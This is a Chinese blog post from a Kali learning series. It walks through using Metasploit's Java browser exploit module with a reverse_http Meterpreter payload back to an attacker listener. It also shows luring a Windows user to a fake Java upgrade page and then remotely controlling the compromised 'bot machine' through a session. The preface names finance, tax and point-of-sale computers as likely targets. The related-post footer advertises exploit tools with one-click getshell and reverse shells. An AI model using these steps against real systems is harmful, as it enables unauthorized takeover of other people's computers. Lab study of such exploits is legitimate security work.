基于java环境漏洞利用

已于 2022-02-27 18:58:49 修改
阅读量2.6k 收藏 3
点赞数 1
分类专栏: kali学习 文章标签: java 安全 开发语言
于 2022-02-27 18:56:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiao_he0123/article/details/123167943
版权

基于java环境的漏洞利用获取shell

前言

一般基于Java的软件开发的电脑上,做财务,大数据,税控软件,收银,OA软件上都会有Java环境的搭建和配置可以利用到这个漏洞

二、操作步骤

1.执行监听设置参数

#开启msf
msfconsole
#设置参数
use exploit/multi/browser/java_jre17_driver_manage #选取所用的模块
show payloads  #查看Java模块中可以使用的payload

在这里插入图片描述

#从中选择一个payload这里我选择的是7
set /java/meterpreter/reverse_http
set LHOST 192.168.124.3
set LPORT 4444
exploit

在这里插入图片描述

2.运行木马构建session

这里会生成一个Local IP将其复制去windows的浏览器中进行复制查询就会出现如图所示的Java升级界面
在这里插入图片描述

这里无论你选择那个按钮都会建立sessions
同时会弹出Java运行的界面但开启TRYUAC所以即使关闭这个界面会话仍会存在
在这里插入图片描述

在这里插入图片描述
通过提示知道会话成功开启而且是session 2

#确认已开启并确认开启session的ID
sessions

在这里插入图片描述

session -i XX(ID号)

就返回到建立的会话中输入命令即可对肉机进行远控
在这里插入图片描述

总结

通过Java所带的这个漏洞进行利用可以有一个很好的效果,但是这个方法一般只适用于win7 和 xp系统中所以仍会有一定的缺陷

just a leaf
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
基于 java 环境漏洞利用获取 Windows系统shell
Cwillchris的博客
05-27 413
基于 java 环境漏洞利用获取 shell 实验环境: kali攻击机(192.168.98.30) window目标机(192.168.98.35) jre-7u17-windows-i586.exe 实验步骤: 1、搭建java环境 xshell上传jre-7u17-windows-i586.exe到win7 安装都一直点下一步就可以 2、 使用 java 模块 getshell msfbd run //进入msf use exploit/multi/brow
java反序列化漏洞利用工具WebLogicExploit
01-14
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行、反弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
Java反序列化漏洞利用工具(全)
09-14
java反序列化漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以……
Java漏洞利用进行大规模攻击
机场信息系统研究员的专栏
05-22 1418
安全研究人员警告说,最近修补的Java远程执行代码漏洞已经被网络犯罪分子利用,通过恐吓软件进行大规模的攻击。   据国外媒体报道,一个标识为CVE-2013-2423的漏洞已经成为网络犯罪分子攻击的目标,而它正是甲骨文4月16日公布的Java 7 Update 21 修复的42个问题之一。   但甲骨文声称该漏洞仅影响客户端,而不是服务器。对于该漏洞造成的影响,甲骨文根据常见漏洞评分系统(CV
漏洞防范与应对:从发现到修复的全攻略】JAVA JMX agent不安全的配置漏洞【原理扫描】漏洞 ,处理过程详解!!!
最新发布
大唐有趣的小胡.
06-24 516
本文揭露了一个高危漏洞——JAVA JMX agent的不安全配置问题。该问题表现为远程主机上的JMX代理缺乏SSL客户端和密码认证,使得未经认证的攻击者能连接并管理相关Java应用,甚至执行任意代码。此漏洞严重威胁了启用了JMX代理的Java应用的安全性。为解决此问题,文章提出了三项关键措施:首先,必须开启认证机制;其次,应限制可访问JMX服务的IP地址;最后,若JMX服务非核心需求,可考虑直接关闭该功能,以彻底消除安全隐患。
基于Java漏洞扫描系统.zip
03-26
【标题】"基于Java漏洞扫描系统"是一个项目,它使用Java编程语言开发,旨在实现自动检测和识别软件系统中的安全漏洞。这个系统通常由多个组件组成,包括但不限于扫描引擎、漏洞数据库、报告生成器以及用户界面。在...
基于java漏洞检测程序 Yasca.zip
05-28
【描述】"基于Java漏洞检测程序Yasca.zip"描述了这个压缩包的核心内容,即一个运行在Java环境下的漏洞检测软件。Yasca通过执行一系列预定义的规则和检查,对代码进行深入分析,从而发现可能存在的安全问题。这包括...
基于Java漏洞检测程序 Yasca.zip
06-17
【标题】"基于Java漏洞检测程序 Yasca.zip" 是一个使用Java语言开发的网络安全工具,主要用于检测系统或网络中的安全漏洞。Yasca通过扫描目标系统或应用,识别潜在的安全风险,帮助管理员及时发现并修复问题,提升...
java反序列化漏洞利用.zip
01-12
java反序列化漏洞利用-JBOSS(含payload生成的java项目,漏洞利用py脚本,shodan部分目标主机搜索结果) 软件开发设计:应用软件开发、系统软件开发、移动应用开发、网站开发C++、Java、python、web、C#等语言的项目...
MSF基于JAVA漏洞获取shell实战
永远是少年
06-13 704
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF基于JAVA漏洞获取shell实战。 一、环境准备 二、MSF设置 三、效果检验
java 文件包含_java的文件包含漏洞
weixin_35591093的博客
02-15 2015
java的文件包含分静态包含的动态包含两种:静态包含:动态包含:两者的区别我就不赘述了。就目前了解静态包含是不存在问题的,因为file的参数不能动态赋值而动态包含是存在问题的我们常说的php文件包含有本地文件包含和远程文件包含两种所以我分析java文件包含的时候也是分这两种情况1.本地文件包含:目前我对java的本地文件包含的理解为:造成的危害就只有文件读取,一般情况下是不能造成命令执行或代码执行...
年度加密漏洞提前锁定:Java JDK 加密实现漏洞可用于伪造凭据
smellycat000的专栏
04-21 315
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Java JDK 的某些加密操作实现中存在一个灾难性漏洞,可使攻击者轻易伪造虚假凭据。该灾难性弱点影响 Java JDK 15及后续版本,已由 Oracle 在今天的关键补丁更新发布中修复。由于这些缺陷牵涉对使用广泛的 ECDSA 签名的实现,因此 Oracle Java 和 OpenJDK 均需更新。问题源自编程错误,...
第1篇:weblogic9.x在JDK1.5下T3反序列化漏洞利用方法
ABC_123的博客
04-05 291
Part1前言年前在一次攻防比赛过程中,遇到了一个9.x版本的weblogic中间件,是非常老版本的Weblogic了,现有的各种漏洞利用工具都没能拿下权限,考虑到之前也曾经遇到过好几次了,于是研究了一整天,总算解决了这个遗留的技术问题。Part2解决问题过程1安装weblogic 9.x版本首先安装weblogic9.x版本,这个过程就不叙述了。使用T3协议发包后,返回...............
漏洞分析】jdk9+Spring及其衍生框架
程序员阿飘 的博客
01-06 131
再来看看DataBinder类的继承关系,DataBinder有一个子类WebDataBinder,是一个特殊的DataBinder,用于从Web请求参数到JavaBean对象的数据绑定,而WebDataBinder的子类ServletRequestDataBinder用于执行从servlet请求参数到JavaBeans的数据绑定,包括对multipart文件的支持。其中bindingResult是BeanPropertyBindingResult的实例,内部会持有一个BeanWrapperImpl。
MSF实战-利用0day双杀java环境-宏感染-安卓客户端进行渗透
L120305q的博客
03-31 697
MSF实战笔记
java 反序列化漏洞 利用思路简介
whatday的专栏
08-01 1459
目录 序列化的过程 readObject方法 反射链 完成反序列漏洞实践 结论 之前听别人讲解反序列化的漏洞听的晕乎乎的,刚脆就趁着周末研究一下反序列化漏洞,并且搭建实战环境实际操作了一把,明白了之后发现之前听的迷糊更多是因为对于反序列漏洞思路不够清晰,明白了反序列的流程之后,反序列化漏洞很好理解。 下面的内容,我将详细论诉反序列化漏洞利用思路。 序列化的过程 这里梳理一下正常的序列化的流程,将一个类进行序列化存储成二进制文件,然后再将该文件进行反序列化生成对象。 首先新建一个新的us
Java17+Tomcat+Jenkins
LJH2428937359的博客
05-10 1005
本文着重介绍了如何在java17(java11以及之后的版本应该都是差不多的)上部署Tomcat+Jenkins。作者是windows11 系统(windows系列都差不多啦)作者系统:windows11 java版本:17提示:以下是本篇文章正文内容,下面案例可供参考其实很好配置,这边难点就是Tomcat服务启动时的一些环境准备问题。(服务器一启动就闪退)
MSF使用详解
m0_52051132的博客
10-19 7929
一、 Meterpreter是什么Meterpreter是Metasploit框架中的一个利器,作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后会返回一个由我们控制的通道,可用于远程执行命令!Metasploit提供了各个主流平台的Meterpreter版本,包括Windows、Linux,同时支持x86、x64平台,另外,Meterpreter还提供了基于PHP和Java语言的实现。Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。
"基于Java技术的校园物品租赁网站系统设计与实现
本文针对校园物品租赁与互联网相结合的需求,基于java技术设计与实现了校园物品租赁网站系统。该系统旨在通过互联网平台实现校园物品租赁的网络化,提高校园物品租赁的管理效率和用户体验。论文从系统描述、系统分析...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值